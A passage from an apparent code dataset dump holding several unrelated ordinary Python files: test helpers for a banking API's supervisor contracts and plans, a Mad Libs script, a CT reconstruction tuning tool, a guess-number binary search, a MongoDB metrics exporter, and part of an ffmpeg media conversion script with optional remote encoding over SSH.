All rights reserved.\n\n# standard libs\nimport hashlib\nimport json\nimport logging\nimport os\nimport random\nimport re\nimport string\nimport unittest\nimport uuid\nfrom typing import Any, Dict, List, Union\n\n# common\nimport common.test_utils.endtoend as endtoend\nfrom common.test_utils.common.utils import replace_supervisee_version_ids_in_supervisor\nfrom common.test_utils.endtoend.kafka_helper import kafka_only_helper, wait_for_messages\n\nlog = logging.getLogger(__name__)\nlogging.basicConfig(\n level=os.environ.get(\"LOGLEVEL\", \"INFO\"),\n format=\"%(asctime)s.%(msecs)03d - %(levelname)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\n\n\nPLAN_UPDATE_EVENTS_TOPIC = \"vault.core_api.v1.plans.plan_update.events\"\n\nTERMINAL_PLAN_STATUSES = [\n \"PLAN_UPDATE_STATUS_REJECTED\",\n \"PLAN_UPDATE_STATUS_ERRORED\",\n \"PLAN_UPDATE_STATUS_COMPLETED\",\n]\n\n\ndef create_supervisor_contract(display_name, supervisor_contract_id=\"\"):\n display_name = display_name\n randomchars = \"\".join(random.choice(string.ascii_letters) for x in range(10))\n supervisor_contract_id = supervisor_contract_id + randomchars\n request_hash = str(\n hashlib.md5(\n (display_name + supervisor_contract_id or \"\").encode(\"utf-8\")\n ).hexdigest()\n )\n\n post_body = {\n \"supervisor_contract\": {\n \"id\": supervisor_contract_id,\n \"display_name\": display_name,\n },\n \"request_id\": request_hash,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/supervisor-contracts\", data=post_body\n )\n log.info(\"Supervisor contract %s created.\", resp[\"id\"])\n\n return resp\n\n\ndef create_supervisor_contract_version(\n supervisor_contract_id,\n display_name,\n code,\n description=None,\n supervisor_contract_version_id=None,\n):\n\n e2e_display_name = \"e2e_\" + display_name\n\n if not description:\n description = \"Description of \" + e2e_display_name\n\n code_hash = hashlib.md5((code).encode(\"utf-8\")).hexdigest()\n\n post_body = {\n \"supervisor_contract_version\": {\n \"id\": supervisor_contract_version_id,\n \"supervisor_contract_id\": supervisor_contract_id,\n \"display_name\": e2e_display_name,\n \"description\": description,\n \"code\": code,\n },\n \"request_id\": code_hash,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/supervisor-contract-versions\", data=post_body\n )\n log.info(\"Supervisor contract %s version uploaded.\", resp[\"id\"])\n endtoend.testhandle.supervisorcontract_name_to_id[display_name] = resp[\"id\"]\n\n return resp\n\n\ndef upload_supervisor_contracts(supervisor_contracts):\n # The supervisee alias may be different from the contract ID used in the E2E test file.\n # We need this mapping to easily replace the specified alias with the uploaded contracts\n supervisee_alias_to_version_id = {\n endtoend.testhandle.CONTRACTS[pid].get(\n \"supervisee_alias\", pid\n ): endtoend.contracts_helper.get_current_product_version_id(pid)\n for pid in endtoend.testhandle.contract_pid_to_uploaded_pid\n }\n\n for product_id, contract_properties in supervisor_contracts.items():\n if \"path\" not in contract_properties:\n raise NameError(\n \"Contract: {} not specified with path. 
\"\n \"Specified with {}\".format(product_id, str(contract_properties))\n )\n\n contractfile = contract_properties[\"path\"]\n with open(contractfile, \"r\") as cfile:\n contractdata = cfile.read()\n\n supervisor_contract = create_supervisor_contract(product_id)\n\n contractdata = replace_supervisee_version_ids_in_supervisor(\n contractdata, supervisee_alias_to_version_id\n )\n\n create_supervisor_contract_version(\n supervisor_contract[\"id\"], product_id, contractdata\n )\n\n\ndef create_plan(\n supervisor_contract_version_id: str, account_id: str = None, details: Dict = None\n) -> str:\n request_id = uuid.uuid4().hex\n\n post_body = {\n \"plan\": {\n \"id\": account_id,\n \"supervisor_contract_version_id\": supervisor_contract_version_id,\n \"details\": details,\n },\n \"request_id\": request_id,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/plans\", data=post_body)\n log.info(\"Plan %s created.\", resp[\"id\"])\n endtoend.testhandle.plans.append(resp[\"id\"])\n\n return resp[\"id\"]\n\n\ndef close_all_plans():\n for plan_id in endtoend.testhandle.plans:\n close_plan(plan_id)\n\n\ndef close_plan(plan_id):\n request_id = uuid.uuid4().hex\n\n post_body = {\n \"plan_update\": {\"plan_id\": plan_id, \"closure_update\": {}},\n \"request_id\": request_id,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/plan-updates\", data=post_body)\n log.info(\"Close plan: %s for plan: %s sent.\", resp[\"id\"], plan_id)\n\n return resp\n\n\ndef get_plan_update(plan_update_id: str) -> Dict:\n params = {\"ids\": [plan_update_id]}\n resp = endtoend.helper.send_request(\n \"get\", \"/v1/plan-updates:batchGet\", params=params\n )\n\n return next(iter(resp[\"plan_updates\"].values()))\n\n\ndef get_plan_updates_by_ids(plan_update_ids: List[str]) -> Dict[str, Dict]:\n \"\"\"\n Fetch details for one or more plan update ids.\n :param plan_update_ids: a collection of plan update ids\n :return: dict with id and update plan information\n \"\"\"\n params = {\"ids\": plan_update_ids}\n resp = endtoend.helper.send_request(\n \"get\", \"/v1/plan-updates:batchGet\", params=params\n )\n return resp[\"plan_updates\"]\n\n\ndef create_plan_update(\n plan_id: str,\n plan_action_type: str,\n action: Dict[str, Any],\n status: str = None,\n account_id: str = None,\n) -> Dict[str, Any]:\n request_id = uuid.uuid4().hex\n\n post_body = {\n \"plan_update\": {\"id\": account_id, \"plan_id\": plan_id, \"status\": status},\n \"request_id\": request_id,\n }\n\n post_body[\"plan_update\"][plan_action_type] = action\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/plan-updates\", data=post_body)\n log.info(\"Plan_update: %s for plan: %s sent.\", resp[\"id\"], plan_id)\n\n return resp\n\n\ndef wait_for_plan_updates(\n plan_update_ids: List[str], target_status=\"PLAN_UPDATE_STATUS_COMPLETED\"\n) -> None:\n\n \"\"\"\n Verrify if given one or more plan update ids are of target status.\n :param plan_update_ids: a collection of plan update ids\n :param target_status: the plan update status to wait for\n \"\"\"\n if endtoend.testhandle.use_kafka:\n wait_for_plan_updates_by_id(\n plan_update_ids=plan_update_ids,\n target_status=target_status,\n )\n else:\n # result_wrapper verifies if all plan_updates have target_status\n # and get_plan_updates_by_ids was able to fetch details for all requested ids\n endtoend.helper.retry_call(\n func=get_plan_updates_by_ids,\n f_args=[plan_update_ids],\n 
expected_result=True,\n result_wrapper=lambda data: all(\n item[\"status\"] == target_status for _, item in data.items()\n )\n and data.keys() == set(plan_update_ids),\n failure_message=f'\"One of plan updates in {plan_update_ids} never completed.\\n\"',\n )\n\n\n@kafka_only_helper\ndef wait_for_plan_updates_by_id(\n plan_update_ids: List[str],\n target_status: str = \"PLAN_UPDATE_STATUS_COMPLETED\",\n) -> None:\n \"\"\"\n Listen to the plan update events Kafka topic for specific plan update ids.\n :param plan_update_ids: a collection of plan update ids to listen for\n :param target_status: the plan update status to wait for\n \"\"\"\n consumer = endtoend.testhandle.kafka_consumers[PLAN_UPDATE_EVENTS_TOPIC]\n\n def matcher(event_msg, unique_message_ids):\n if target_status == \"PLAN_UPDATE_STATUS_PENDING_EXECUTION\":\n plan_update_wrapper = event_msg.get(\"plan_update_created\")\n else:\n plan_update_wrapper = event_msg.get(\"plan_update_updated\")\n event_request_id = event_msg[\"event_id\"]\n if plan_update_wrapper:\n plan_update = plan_update_wrapper[\"plan_update\"]\n if plan_update[\"id\"] in unique_message_ids:\n if plan_update[\"status\"] == target_status:\n return plan_update[\"id\"], event_request_id, True\n\n if plan_update[\"status\"] in TERMINAL_PLAN_STATUSES:\n log.warning(\n f\"Plan update {plan_update['id']} returned a status of \"\n f\"{plan_update['status']}\"\n )\n return \"\", event_request_id, False\n\n failed_plan_updates = wait_for_messages(\n consumer,\n matcher=matcher,\n callback=None,\n unique_message_ids={update_id: None for update_id in plan_update_ids},\n inter_message_timeout=30,\n matched_message_timeout=30,\n )\n\n if len(failed_plan_updates) > 0:\n raise Exception(\n f\"Failed to retrieve {len(failed_plan_updates)} of {len(plan_update_ids)} \"\n f\"plan updates for update ids: {', '.join(failed_plan_updates)}\"\n )\n\n\ndef create_and_wait_for_plan_update(\n plan_id: str,\n plan_action_type: str,\n action: Dict[str, Any],\n status: str = None,\n account_id: str = None,\n) -> Dict[str, Any]:\n plan_update = create_plan_update(\n plan_id, plan_action_type, action, status, account_id\n )\n plan_update_id = plan_update[\"id\"]\n wait_for_plan_updates([plan_update_id])\n return plan_update\n\n\ndef add_account_to_plan(plan_id, account_id):\n action = {\"account_id\": account_id}\n log.info(f\"preparing to link account {account_id} to plan {plan_id}\")\n return create_and_wait_for_plan_update(plan_id, \"associate_account_update\", action)\n\n\ndef link_accounts_to_supervisor(supervisor_contract, account_list):\n supervisor_contract_version_id = endtoend.testhandle.supervisorcontract_name_to_id[\n supervisor_contract\n ]\n plan_id = create_plan(supervisor_contract_version_id)\n\n for account in account_list:\n add_account_to_plan(plan_id, account)\n\n return plan_id\n\n\ndef get_plan_associations(account_ids=None, plan_ids=None):\n if not account_ids and not plan_ids:\n raise NameError(\"account id nor plan id specified\")\n if account_ids and not isinstance(account_ids, list):\n account_ids = [account_ids]\n if plan_ids and not isinstance(plan_ids, list):\n plan_ids = [plan_ids]\n\n params = {\"account_ids\": account_ids, \"plan_ids\": plan_ids, \"page_size\": \"100\"}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/account-plan-assocs\", params=params)\n\n return resp[\"account_plan_assocs\"]\n\n\ndef get_plan_schedules(plan_id=None, page_size=\"20\"):\n if not plan_id:\n raise NameError(\"plan id not specified\")\n\n params = {\"plan_id\": plan_id, 
\"page_size\": page_size}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/plan-schedules\", params=params)\n\n schedule_ids = [s[\"id\"] for s in resp[\"plan_schedules\"]]\n\n response_schedules = endtoend.core_api_helper.get_schedules(schedule_ids)\n\n # A dict of schedule event_names to their schedule objects\n return {\n schedule_details[\"display_name\"].split()[0]: schedule_details\n for schedule_details in response_schedules.values()\n if schedule_details[\"status\"] != \"SCHEDULE_STATUS_DISABLED\"\n and re.search(rf\"{plan_id}\", schedule_details[\"display_name\"])\n }\n\n\ndef get_plan_details(plan_id):\n\n params = {\"ids\": plan_id}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/plans:batchGet\", params=params)\n\n return resp[\"plans\"][plan_id]\n\n\ndef check_plan_associations(\n test: unittest.TestCase, plan_id: str, accounts: Union[List[str], Dict[str, str]]\n):\n \"\"\"\n Helper method to validate that plan currently has expected associations. If a given account has\n been through multiple associations with the same plan, only the latest is considered\n :param plan_id: the plan id\n :param account_ids: the account ids to validate are currently linked. If passed as a list, the\n link statuses are assumed to be active. If passed as a dict, the values are the statuses and the\n keys are the account ids.\n \"\"\"\n plan_associations = endtoend.supervisors_helper.get_plan_associations(\n plan_ids=plan_id\n )\n\n # there could be multiple assocs with different statuses, but we'll only consider the latest\n actual_linked_accounts = {\n association[\"account_id\"]: association[\"status\"]\n for association in plan_associations\n }\n\n if isinstance(accounts, list):\n accounts = {\n account_id: \"ACCOUNT_PLAN_ASSOC_STATUS_ACTIVE\" for account_id in accounts\n }\n\n test.assertEqual(\n actual_linked_accounts,\n accounts,\n \"latest and expected associations do not match\",\n )\n","sub_path":"common/test_utils/endtoend/supervisors_helper.py","file_name":"supervisors_helper.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"163057494","text":"import re\n\nfilePath = input(\"Please provide a file path to a text file: \")\nmadLibsFile = open(filePath)\ncontent = madLibsFile.read()\n\nwordListRx = re.findall(r'(\\w+)(\\s|[?.!](\\s?))', content)\nbuilderList = []\n\nfor i in range(len(wordListRx)):\n rules = ['ADJECTIVE' in wordListRx[i],\n 'NOUN' in wordListRx[i],\n 'VERB' in wordListRx[i],\n 'ADVERB' in wordListRx[i]]\n \n if any(rules):\n partOfSpeechTupleToList = [''.join(i) for i in wordListRx[i]]\n userResponse = input(f\"Enter an {partOfSpeechTupleToList[0].lower()}: \")\n tupleToList = [''.join(i) for i in wordListRx[i]]\n builderList.extend([userResponse, tupleToList[1]])\n else:\n builderList += [''.join(i) for i in wordListRx[i]]\n\nfinalString = ''.join(builderList)\nprint(finalString)\n\n","sub_path":"madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"635972612","text":"\"\"\"\nWritten by Michelle Skip\nCode is to allow interactive determination of CT parameters: Centre of rotation offset, and angular step.\n\nTo-do-list:\n\n*use slidermin and slidermax to make intensity not overlap\n*Get tomopy to do subpixel cor\n*ignore tomopywarning or stop it from printing out\n*have precompute and compute on the fly 
options\n\"\"\"\n\nPROJECTION_DIR = \"F:\\\\17277B_right\\Corrected_data_centre\" #Directory containing the CT projections\nPROJECTION_NAME = '\\*Z1*.tif'\nMAKE_SINOGRAM = False #True: read in projections, create sinogram and save a copy in projectio directory, False: read in previously made sinogram\nSLICE = 900 #the y value in FIJI / ImageJ of the slice of interest (First row = 0, if display size was 100 pixels tall, last row would be 99, as starting at 0)\n\nCENTRE_OF_ROTATION_OFFSET_MIN = 52 #minimum cor value to reconstuct\nCENTRE_OF_ROTATION_OFFSET_MAX = 52 #maximum cor value to reconstuct\nCENTRE_OF_ROTATION_OFFSET_STEP = 1. #Step size to move between min and max\n\nROTATION_ANGLE_MIN =179\nROTATION_ANGLE_MAX =181\nROTATION_ANGLE_STEP =0.25\n\nimport glob\nimport tifffile as tiff \nimport numpy as np\nfrom skimage import io\nfrom scipy import ndimage\nimport tomopy\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nimport pbi_sipr_kitchen\nfrom dask import delayed, compute, threaded, multiprocessing\nfrom dask.diagnostics import Profiler, ProgressBar\nfrom scipy import ndimage\n\n# Read in projections and create sinogram, or read in sinogram previously created\nsino_paths = glob.glob(PROJECTION_DIR+'\\*_sino.tif') #checks for sinograms in the directory\nprojection_paths = sorted(set(glob.glob(PROJECTION_DIR+PROJECTION_NAME))\n -set(sino_paths)) #Creates a list of files in the projection directory.removes the sinograms from the list and sorts the projections\nnumber_projections = len(projection_paths) #counts the number of projections in the CT\n\n\ndef read_projection(projection_number, path):\n \"\"\"\n Reads in a projection\n Use this with DASK to create sinograms quickly\n \"\"\"\n global sinogram\n projection = tiff.imread(path)\n sinogram[projection_number,0,:] = projection[SLICE,:]\n return\n\nif MAKE_SINOGRAM:\n projection = tiff.imread(projection_paths[0])\n sinogram = np.ones([number_projections,1,projection.shape[1]])\n print(\"Making sinograms\")\n\n values = [delayed(read_projection)(projection_number, path) for \n projection_number, path in enumerate(projection_paths)]\n with Profiler() as prof, ProgressBar():\n compute(*values, scheduler='threads') #run on local windows use threaded.get\n\n np.clip(sinogram,1e-10,None, out= sinogram) #removes negative values in the sinogram\n sinogram = -np.log(sinogram)\n tiff.imsave(PROJECTION_DIR+\"\\\\\"+str(SLICE)+\"_sino.tif\", \n sinogram.astype(np.float32))\nelse:\n print(\"Reading in sinogram\")\n sinogram = tiff.imread(PROJECTION_DIR+\"\\\\\"+str(SLICE)+\"_sino.tif\")\n\n\n#Pre compute reconstructions\n\noptions = {'tx_sinogram_type':'cuda', 'method':'FBP_CUDA'} #astra options\n#options = {'tx_sinogram_type':'linear', 'method':'FBP'}\n\ncor_range = np.linspace(CENTRE_OF_ROTATION_OFFSET_MIN + sinogram.shape[2]/2.,\n CENTRE_OF_ROTATION_OFFSET_MAX + sinogram.shape[2]/2.,\n (CENTRE_OF_ROTATION_OFFSET_MAX-CENTRE_OF_ROTATION_OFFSET_MIN)/\n CENTRE_OF_ROTATION_OFFSET_STEP +1) \nrotation_range = np.linspace(ROTATION_ANGLE_MIN,\n ROTATION_ANGLE_MAX,\n (ROTATION_ANGLE_MAX-ROTATION_ANGLE_MIN)/ROTATION_ANGLE_STEP +1)\n\nreconstructions =np.zeros([len(cor_range),len(rotation_range),\n sinogram.shape[2],sinogram.shape[2]])\n\nnumber_of_recons = len(cor_range)*len(rotation_range)\ncount = 0\n\n\nfor j, rotation in enumerate(rotation_range):\n angles = (np.linspace(0,rotation,num=number_projections)*np.pi)/180.\n for i, cor in enumerate(cor_range):\n count+=1\n print(f\"Making recontruction {count} of 
{number_of_recons}\")\n tomo = tomopy.recon(sinogram,angles,center=cor,\n algorithm=tomopy.astra, options=options)\n reconstructions[i,j,:,:]= np.squeeze(tomo)\n\n# Create figure and sliders\nfigure = plt.figure(figsize =(18,12)) #Creates the figure object and sets it so that it opens fullscreen\ndisplay = plt.subplot(1,2,1) #Creates the display axes, and positions in on the left hand side, leaving space on the right for the slider bars\nimage = display.imshow(np.squeeze(reconstructions[0,0,:,:])) #puts the reconstuction in the display axes\n\nrecon_min = np.amin(reconstructions[0,0,:,:])\nrecon_max = np.amax(reconstructions[0,0,:,:])\nintensity_min = Slider(plt.axes([0.6, 0.1, 0.35, 0.03]),\n \"Minimum Intensity\",\n recon_min,\n recon_max, \n valinit=recon_min,\n valstep=0.0001,\n )\nintensity_max = Slider(plt.axes([0.6, 0.2, 0.35, 0.03]), \n \"Maximum Intensity\",\n recon_min,\n recon_max,\n valinit=recon_max,\n valstep=0.0001)\ncoro_slider = Slider(plt.axes([0.6,0.3,0.35, 0.03]), \n \"Centre of rotation offset\",\n CENTRE_OF_ROTATION_OFFSET_MIN,\n CENTRE_OF_ROTATION_OFFSET_MAX,\n valinit = CENTRE_OF_ROTATION_OFFSET_MIN,\n valstep=CENTRE_OF_ROTATION_OFFSET_STEP)\nangle_slider = Slider(plt.axes([0.6,0.4,0.35, 0.03]), \n \"Angle of rotation\",\n rotation_range[0],\n rotation_range[-1],\n valinit = rotation_range[0],\n valstep=ROTATION_ANGLE_STEP)\n\ndef update_plot(val):\n \n cor_index = np.where(np.around(cor_range,decimals= 1) == \n round(coro_slider.val + sinogram.shape[2]/2. ,1))[0][0]\n angle_index = np.where(np.around(rotation_range,decimals= 3) == \n round(angle_slider.val, 3))[0][0]\n \n image.set_data(np.clip(reconstructions[cor_index,angle_index,:,:],\n intensity_min.val,intensity_max.val))\n image.set_clim([intensity_min.val,intensity_max.val])\n \n figure.canvas.draw_idle()\n\nintensity_min.on_changed(update_plot)\nintensity_max.on_changed(update_plot)\ncoro_slider.on_changed(update_plot)\nangle_slider.on_changed(update_plot)\nplt.show()\n\n\ncor_index = np.where(np.around(cor_range,decimals= 1) == \n round(coro_slider.val + sinogram.shape[2]/2. 
,1))[0][0]\nangle_index = np.where(np.around(rotation_range,decimals= 3) == \n round(angle_slider.val, 3))[0][0]\ncor_range\n\nprint(f'CORO = {coro_slider.val}, angle of rotation = {angle_slider.val}, and angular step = {angle_slider.val / number_projections}')\n \n","sub_path":"CT_parameters.py","file_name":"CT_parameters.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"390265283","text":"# Guess Number Higher or Lower\n# We are playing the Guess Game. The game goes as follows:\n# I pick a number from 1 to n. You have to guess which number I picked.\n# Every time you guess wrong, I will tell you whether the number is higher or lower.\n# You can call a pre-defined API guess(int num), which returns 3 possible results (-1, 1, or 0):\n#\n# -1 : my number is lower\n# 1 : my number is higher\n# 0 : congrats! you guessed it!\n# Example:\n#\n# Input: n = 10, pick = 6\n# Output: 6\n\n# The guess API is already defined for you.\n# @param num, your guess\n# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0\ntarget = 9\ndef guess(num):\n global target\n # print(num,target)\n if num > target:\n return -1\n elif num < target:\n return 1\n return 0\n\n# print(guess(6))\n# print(guess(7))\n# print(guess(5))\n\n\nclass Solution(object):\n def guessNumber(self, n):\n left = 1\n right = n\n while left <= right:\n mid = (left + right) // 2\n if guess(mid) == 1:\n left = mid + 1\n elif guess(mid) == -1:\n right = mid - 1\n else:\n return mid\n\n return -1\n\ns = Solution()\nprint('ret:',s.guessNumber(10))\n","sub_path":"guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"412954740","text":"from pymongo import MongoClient\n\n\ndef getIssueType(e):\n allFiles = e['files']\n for f in allFiles:\n allMetrics = f['metrics']\n if 'Related issue type' in allMetrics:\n return allMetrics['Related issue type']['value']\n\ndef dumpToFile(filename, listOfLists):\n with open(filename,'w') as f:\n for l in listOfLists:\n line = ' '.join([str(n) for n in l])+'\\n'\n f.write(line)\n\n\nc = MongoClient()\ndb = c.bugprediction\nallRevisionEntries = db.revisions.find()\n\nnoIssueRevisionEntries = []\nbugRevisionEntries = []\nexcRevisionEntries = []\nbothRevisionEntries = []\notherIssueRevisionEntries = []\n\nallValueEntries = []\n\ntargetLists = {\n 0.0: noIssueRevisionEntries,\n 1.0: bugRevisionEntries,\n 2.0: excRevisionEntries,\n 3.0: bothRevisionEntries,\n 4.0: otherIssueRevisionEntries\n}\n\nmetrics = ['Change frequency',\n 'File age',\n 'Time since last edit',\n 'Number of affecting commits',\n 'Number of authors']\n\n\nfor e in allRevisionEntries:\n issueType = getIssueType(e)\n # print e['_id']\n allFiles = e['files']\n for f in allFiles:\n allMetrics = f['metrics']\n valuesList = [allMetrics[m]['value'] for m in metrics]\n allValueEntries.append(valuesList)\n targetLists[issueType].append(valuesList)\n\n\ndumpToFile(\"all.txt\", allValueEntries)\ndumpToFile(\"noIssue.txt\", noIssueRevisionEntries)\ndumpToFile(\"bug.txt\", bugRevisionEntries)\ndumpToFile(\"except.txt\", excRevisionEntries)\ndumpToFile(\"both.txt\", bothRevisionEntries)\ndumpToFile(\"other.txt\", otherIssueRevisionEntries)\n\n\n\n\n","sub_path":"data/mongo-metrics-fetch/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"130291733","text":"# The MIT License(MIT)\n# Copyright(c) 2019 Tiago Santos\n# Copyright(c) 2016 Joseph Milazzo\n#\n# Permission is hereby granted, free of charge, to any person obtaining a 
copy of this software and associated documentation\n# files(the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy,\n# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE \n# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR \n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, \n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n# This script will convert all the video files in your library to one format\n# The settings below are designed to optimize streaming to Chromecast\n#\n# Requirements:\n# Python 3\n# python-psutil\n# python-mediainfo\n# python-paramiko\n# ffmpeg\n#\n# NEW VERSION:\n# This script implements running the ffmpeg conversion remotely\n# To do so, another computer will have to have a folder with the ffmpeg binaries and a running SSH Server\n# The file to be converted is sent via SFTP, and then the command is executed via SSH\n# The conversion will only be done remotely if video encoding is needed\n#\n# Usage:\n#\n# Edit settings below\n# Run with \"python3 media_convert_2.py\"\n# This script has been tested on Linux only, but should work on windows\n# To run on Windows, be sure to remove the \"nice -n 20\" part from the beggining of ffmpeg_base_cmd\n# and add the ffmpeg folder to PATH or insert the full path on ffmpeg_base_cmd\n\n# This is based off of the media-convert script created by Joseph Milazzo\n# https://bitbucket.org/majora2007/media-convert/src/master/\n\nfrom collections import defaultdict\nimport os\nimport logging\nfrom pymediainfo import MediaInfo\nimport paramiko\nimport subprocess\nimport signal\nimport psutil\nimport time\nimport sys\n\n#######################################################################\n# Variables #\n#######################################################################\n\n# Desired extension for files. Best container for streaming to chromecast is mp4\nglobal EXT\nEXT = 'mp4'\n\n# Where to store temporary and log files\nwork_dir = '/home/plex/'\n\n# Temporary enconding file\ntemp_file = work_dir + 'temp.' + EXT\n\n# A list of directories to scan\nwatched_folders = ['/home/plex/video']\nexclude = []\n\n# Conditions for video recoding\nMAX_BITRATE = 5000000\nMAX_HEIGHT = 1080\nMAX_WIDTH = 1920\nVIDEO_CODEC = \"AVC\"\nVIDEO_PROFILE = \"Main\"\n\n# Recode all videos ending with these extensions\nvalid_extensions = ['rmvb', 'mkv', 'avi', 'mov', 'wmv', 'm4v']\n\n# Conditions for audio recoding. 
Chromecast may force sorround audio on stereo TVs, so force channels to 2 to convert all files to stereo audio\nMAX_CHANNELS = 2\nAUDIO_CODEC = \"AAC\"\n\n# FFMPEG parameters\nffmpeg_base_cmd = \"nice -n 20 ffmpeg -loglevel error -hide_banner -y -i \"\nffmpeg_video_encode = \" -c:v libx264 -preset faster -tune zerolatency -profile:v main -pix_fmt yuv420p -crf 23 -b:v 0 -maxrate \" + str(MAX_BITRATE) + \" -bufsize \" + str(int(MAX_BITRATE/2)) + \" -vf \\\"pad=\\'ceil(min(\" + str(MAX_WIDTH) + \",iw)/2)*2\\':\\'ceil(min(\" + str(MAX_HEIGHT) + \",ih)/2)*2\\',scale=\\'min(\" + str(MAX_WIDTH) + \",iw)\\':\\'min(\" + str(MAX_HEIGHT) + \",ih)\\':force_original_aspect_ratio=decrease\\\"\"\nffmpeg_audio_encode = \" -c:a aac -ac 2 -b:a 192k\"\nffmpeg_middle_cmd = \" -max_muxing_queue_size 1024 -map_metadata -1 -movflags +faststart\"\n\n# Flag to denote whether to delete source files after successfull encode\nDELETE = True\n\n# Flag to denote whether to just run MediaInfo on files\nJUST_CHECK = False\n\n# Verbosity level on log file\nLOG_LEVEL = logging.INFO\n\n#######################################################################\n# Remote Conversion (SSH) #\n#######################################################################\n\n# If enabled, when a video conversion is needed, the script will send the file to a remote host and execute the ffmpeg command there\nssh_enabled = True\n\n# Settings for ssh connection. Password can be either the password for the user or for the key file.\nssh_host = \"192.168.1.1\"\nssh_port = 22\nssh_user = \"johndoe\"\nssh_password = \"supersecret\"\nssh_key = \"/path/to/keyfile\"\n\n# This folder must contain the ffmpeg executable and will store the temporary video files. \n# Use an exclusive folder for this as files may be deleted or overwritten.\nssh_folder = \"C:\\\\ffmpeg\"\n\nssh_ffmpeg_base_cmd = \"ffmpeg.exe -loglevel error -hide_banner -y -i \"\nssh_ffmpeg_video_encode = \"-c:v h264_nvenc -preset slow -zerolatency 1 -profile:v main -pix_fmt yuv420p -cq 24 -qmin 23 -qmax 25 -b:v 0 -maxrate \" + str(MAX_BITRATE) + \" -bufsize \" + str(int(MAX_BITRATE/2)) + \" -vf \\\"pad=\\'ceil(min(\" + str(MAX_WIDTH) + \",iw)/2)*2\\':\\'ceil(min(\" + str(MAX_HEIGHT) + \",ih)/2)*2\\',scale=\\'min(\" + str(MAX_WIDTH) + \",iw)\\':\\'min(\" + str(MAX_HEIGHT) + \",ih)\\':force_original_aspect_ratio=decrease\\\"\"\nssh_ffmpeg_audio_encode = \" -c:a aac -ac 2 -b:a 192k\"\nssh_ffmpeg_middle_cmd = \" -max_muxing_queue_size 1024 -map_metadata -1 -movflags +faststart\"\n\n#######################################################################\n# Program #\n#######################################################################\n\n# Paths to all valid files\npaths = []\n\n# List of conversions\ncommands = []\n\nglobal ssh_client\nglobal sftp_client\n\ndef setup_logger(dir, filename, debug_lvl):\n log_file = filename\n log_directory = os.path.abspath(dir)\n\n if not os.path.exists(log_directory):\n os.mkdir(log_directory)\n\n log_filePath = os.path.join(log_directory, log_file)\n\n if not os.path.isfile(log_filePath):\n with open(log_filePath, \"w\") as emptylog_file:\n emptylog_file.write('')\n\n logging.basicConfig(filename=log_filePath, level=debug_lvl,\n format='%(asctime)s %(message)s')\n\n\ndef needs_convert(file):\n for extension in valid_extensions:\n if file.endswith(extension):\n logger.warning('Change format: ' + file)\n return True\n if file.endswith(EXT):\n stinfo = os.stat(file)\n if stinfo.st_mtime > stinfo.st_atime:\n logger.debug('Ignore: ' + file)\n return False\n 
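# NOTE: after a successful encode, main() pushes the file's mtime ~5 years\n # past its atime via os.utime() (157680000 s), so mtime > atime marks an\n # already-processed file; anything else with the target extension is redone.\n 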
logger.warning('Recode: ' + file)\n return True\n return False\n\n\ndef normalize_path(path):\n return path.replace('\\\\', '/')\n\n\ndef to_mp4_naming(filename):\n parts = filename.split('.')\n parts[len(parts)-1] = EXT\n output_path = '.'.join(parts)\n return output_path\n\n\ndef delete(path):\n logger = logging.getLogger(__name__)\n logger.info('Deleting ' + path)\n try:\n os.remove(path)\n except OSError:\n logger.exception('There was an issue deleting ' + path)\n\ndef remote_delete(path):\n logger = logging.getLogger(__name__)\n logger.info('Deleting on remote folder: ' + path)\n try:\n sftp_client.remove(path)\n except IOError:\n logger.exception('There was an issue deleting ' + path)\n\ndef move(file_from, file_to):\n logger = logging.getLogger(__name__)\n logger.info('Moving ' + file_from + ' to ' + file_to)\n try:\n os.rename(file_from, file_to)\n except OSError:\n logger.exception('There was an issue moving ' +\n file_from + ' to ' + file_to)\n\n\ndef signal_handler(signum, frame):\n pass\n\n\nif __name__ == '__main__':\n setup_logger(work_dir, 'media-convert.log', LOG_LEVEL)\n logger = logging.getLogger(__name__)\n # Register signals, such as CTRL + Cf\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n logger.info(\"######### Script Executed at 